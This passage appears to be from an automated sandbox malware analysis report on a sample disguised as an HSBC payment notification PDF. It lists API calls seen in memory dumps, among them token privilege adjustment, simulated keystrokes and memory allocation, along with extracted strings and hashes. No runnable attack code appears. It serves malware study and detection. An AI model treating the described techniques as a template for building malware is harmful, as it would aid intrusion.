• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 3bd1fa15e3c828fb50f6c50bba16ea225a605f8db31995fd9f05c231be0d4e56
• Instruction ID: f55ecff98ac07c2d325177e10d906cb11c9b861d8e4c23bb84934096ed0faa42
• Instruction Fuzzy Hash: 68E0CDA0C0D381CFF7145B58C559335BFA07F55289FC6C85DEAD405091DB754054C743
APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: ddd4119da2cbcf449f39d0289cf000e192157b935cac5166c403b76355fff52d
• Instruction ID: f99015b9fa4a737baae92caed834476c8e7d1d3bb36ae5e326e2378815ac8516
• Instruction Fuzzy Hash: 8FE08C34909704DFF7408F25C50876BBBE0FF88794F80C90CEA9886140E7B8D588DB41
APIs
• SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
• Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
• Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: faa651ff60d03cfd3f5bd91f61ec85dc13814a230677dbf13c75e985f6af9628
• Instruction ID: 0c62cb7b9fa386c0a349fe4ba5e1eb8ab5d6ae7aaeb85e4a905bbe3dcb482684
• Instruction Fuzzy Hash: 2BD0EC7590E354DADA109F06990839AFBA0AB85664F809A49E5E443180C3B44214DBC2
APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 6bf894a8f4fdf5a4be4b604a6052b96937b3abc72c9383f522c866c84b9eaf65
• Instruction ID: a382e812f2cfa8757c8fbff854a2ce9981ab29a363aa6aa2a277168c0b6f382f
• Instruction Fuzzy Hash: DED0C751C0E3909EDB2A461454686B537645B411F4FD5074AC371844E193B54E5CC293
APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 8a2b4eec43a6aa214b4f7e2c9a328b67d72f3d45ea26e6e6d7d12a6b7ffa2a28
• Instruction ID: f59d07112453d8723e5ba3a52ac9766cce32cc52c7c19499008789d2c0177910
• Instruction Fuzzy Hash: 7FD012B15583409FFB409F50C09931AF7D0F745249F80C83CD59546640C7B8480E9F41
APIs
• SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 650b1be84df52a8daa95894bab3726a728ae8eef4992e736c6a88369ef4120fb
• Instruction ID: 0de1cde18454980883cf3da6988a9403b02314b0d9e19d492313ab35161e43e4
• Instruction Fuzzy Hash: 53D01232C0F3C08FC71B87308834021BFB25E4B18038BC0C7C2AACB5A396288C08C326
APIs
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
• Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: db3d874e914dce79e7043b4d0cf5498309d9b82b561ceb4573be6442ffe9b797
• Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
• Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                                                                                                                                                    APIs
                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 02F18199
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,02F15563), ref: 02F1826F
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,02F15563), ref: 02F18280
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,02F15563), ref: 02F1828E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 85819701-0
                                                                                                                                                    • Opcode ID: da85ce1f38623a8dbf3e2215d5ec83eb79731c7b522cc3f2efeb539dbc61dd68
                                                                                                                                                    • Instruction ID: 41ec3974f1c84b49a21663a1b05f6e02e2afe2f2d96bd776eecd08d44f79ce8d
                                                                                                                                                    • Opcode Fuzzy Hash: da85ce1f38623a8dbf3e2215d5ec83eb79731c7b522cc3f2efeb539dbc61dd68
                                                                                                                                                    • Instruction Fuzzy Hash: B1E04827E4C694CAF62F06285F185767A2459035E8BCC0656DF22E3271E3568C14C5A2
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: f262e65ebd7d8ec71a22938d4d1be7d3be31e7067efaf09a1f69a93ef863ee72
                                                                                                                                                    • Instruction ID: e730242f66639839081701d5965bdfe5816fd256e1563d6897bba08da93fb434
                                                                                                                                                    • Opcode Fuzzy Hash: f262e65ebd7d8ec71a22938d4d1be7d3be31e7067efaf09a1f69a93ef863ee72
                                                                                                                                                    • Instruction Fuzzy Hash: 04D05B37F0CA50927A3F552C4B445376A0479418F47C80714EF73E1154F755C810C0A2
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: e773ed0fc7729b9169f680fa1de34ef865221b9da9dcd97c8130435d8c76d727
                                                                                                                                                    • Instruction ID: ce4a24e6abd2e21217132ac75fdd41ada253dafd3fad5be23ea40353781421a4
                                                                                                                                                    • Opcode Fuzzy Hash: e773ed0fc7729b9169f680fa1de34ef865221b9da9dcd97c8130435d8c76d727
                                                                                                                                                    • Instruction Fuzzy Hash: 8CD097A2E0C210D6DE089E28AC4DD3D3649968C2E03C80A07BF03C6019D620C400CFB7
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction ID: d01232a9c21b76ad3d0fbc66ffee26019a9724c11971d48a24ba585d0451a274
                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction Fuzzy Hash: FBE0E67494010DDFDB00DFB4D5496DD7BB4EF04301F100265FD02D2280D6309E508A62
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02F14F02,00000060), ref: 02F15BD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 7b81bc91e02cbd90697341b6a7a86b4d85449314a3ad1a57fdbd9e9a0e096485
                                                                                                                                                    • Instruction ID: 82ce1dd4ae1607a01432f3c9a49d00ca4f24f627855e17d7c456df425b8996a1
                                                                                                                                                    • Opcode Fuzzy Hash: 7b81bc91e02cbd90697341b6a7a86b4d85449314a3ad1a57fdbd9e9a0e096485
                                                                                                                                                    • Instruction Fuzzy Hash: 3FC092F8EC8368AEFD3A9658588EFA97B245780BA5FC44540B319994E1D7B120A0D609
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CC29
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CD33
                                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                                                                                    • SetCapture.USER32(?), ref: 0048CE69
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0048CF00
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CFD1
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D03D
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                                                                                    • GetParent.USER32(?), ref: 0048D0BA
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D154
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D22F
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                                                                                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                    • String ID: @GUI_DRAGID$F$pbL
                                                                                                                                                    • API String ID: 3977979337-2097280626
                                                                                                                                                    • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                                                                                                                    • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                                                                                    • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                                                                                                                    • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_memset
                                                                                                                                                    • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                                                                                    • API String ID: 1357608183-1426331590
                                                                                                                                                    • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                    • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                                                                                    • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                    • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                                                                                    • IsIconic.USER32(?), ref: 0043D66E
                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                                    • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                    • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                                                                                    • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                    • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                    • _memset.LIBCMT ref: 00458353
                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                                                                                      • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                      • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                                                    • Opcode ID: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                    • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                                                                                    • Opcode Fuzzy Hash: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                    • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
